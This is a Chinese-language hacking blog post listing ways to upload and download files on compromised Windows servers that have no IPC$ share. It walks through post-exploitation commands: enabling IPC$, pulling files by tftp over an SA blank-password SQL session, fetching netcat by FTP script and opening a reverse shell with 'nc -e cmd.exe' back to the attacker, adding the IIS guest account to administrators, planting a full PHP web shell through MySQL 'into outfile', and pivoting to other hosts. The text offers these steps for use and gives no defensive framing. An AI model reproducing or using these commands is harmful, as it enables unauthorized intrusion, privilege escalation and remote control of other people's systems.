對於沒有開IPC$的主機 上傳下載的一些思路

穩萊

對於沒有開IPC$的主機 上傳下載的一些思路

 

 

比如用溢出攻擊得到權限 發現沒有開139 or 445 我們可以從內部make it崩潰:
1.net share ipc$
例如,使用webdav溢出得到system net share 看一下 沒有任何東西 用什麼東西都連不上 所以 要先打開ipc$——net share ipc$
剩下的你願意使用什麼就可以了,比如dameware.

2.tftp.exe
獲得sa空口令,使用sqlexec鏈接,只開了80和1433怎么辦?別忘了,你是在內部控制他,防火墻是可以從內部突破的。
打開本地的tftp server 然后在sqlexec中輸入
tftp -i yourip get files
就可以了。

3.ftp 腳本 + nc
比如從80端口溢出后可以,寫一個ftp的腳本然后用ftp -s ftp.txt從你的ftp下載nc。在溢出的命令提示符下使用nc
nc -e c:\winnt\system32\cmd.exe yourip 888
在本地命令提示符下
nc -l -p 888 -vv


4.iusr_xx 高權限的cmd.asp
有運氣的成分,80端口溢出,net localgroup administrators iusr_computername /add
用echo 寫一個cmd.asp……

5.使用mysql寫的cmd.php
我轉再過一篇文章 再貼一次
通過mysql入侵
1、在默認的mysql數據庫中生成一個叫tmp的表,只有一個字段名,叫cmd,數據類型為text(可以不分大

小寫)
use mysql
create table tmp(cmd text)
2、在tmp表cmd字段中寫入一段php代碼(注意這個文件導出后一定要叫cmd2.php)
insert into tmp values(<|><body onload=document.form1.cmd.focus()>
<?if (isset($cmd)){$cmd=stripslashes($cmd);exec(\"$cmd>temp.dat\");}?>
<style type=\"text.css\">
<!\-\-.form1
{background:#ffffff;border-bottom:#666666 1px solid;border-left:#666666 1px solid;border-

right:#666666 1px solid;border-top:#666666 1px solid;color:#3c464f;font-size:9pt;clip:rect

();cursor:text;height:auto;width:auto;margin-top:0px;margin-right:0px;margin-

bottom:0px;margin-left:0px}
\-\-></style><p class=\"title\"> </p><form name=\"form1\" method=\"post\"

action=\"/cmd2.php\"><input type=\"text\" name\"cmd\" size=\"50\" class=\"form1

\"></from><form name=\"\form2" method=\"post\" action=\"\"><p><textarea name=\"text\"

cols=\"120\" row=\"50\" class=\"form1\"><?if
(isset($cmd)){readfile(\"temp.dat\");unlink(\"text.dat\");}?></textarea></p></form></body>
寫入到你剛才看見的web實際目錄中(要注意的問題是直接寫到你剛才看到的路徑中可并不能直接訪問到

cmd2.php,你可以從里往外多試試)
select * form tmp into outfile <|>d:\\path\\cmd2.php<|>;
刪除 tmp表
drop table tmp;
3、訪問cmd2.php
這是你將得到的web shell是system身份的!


6.telnet
用opentelnet的腳本

7.同一防火墻內另一主機的輔助入侵
有時候一些主機使用的是硬防火墻,很多主機躲在一個防火墻下面,它們之間是彼此無保護的,如果你成功的入侵了一臺內網主機,你就可以實現向其他主機進軍。

8.一些發送到80端口的腳本
正在搜集……
9.正在想
……

 

 給當前日誌評分:
Loading Vote
正在讀取評分資料...


文章來自: Tank部落格
引用通告: 查看所有引用 | 我要引用此文章
Tags: IPC$
相關日誌:

評論: 0 | 引用: 0 | 查看次數: -
發表評論
暱 稱:
密 碼: 遊客發言不需要密碼.
內 容:
驗證碼: 驗證碼
選 項:
雖然發表評論不用註冊,但是為了保護您的發言權,建議您註冊帳號.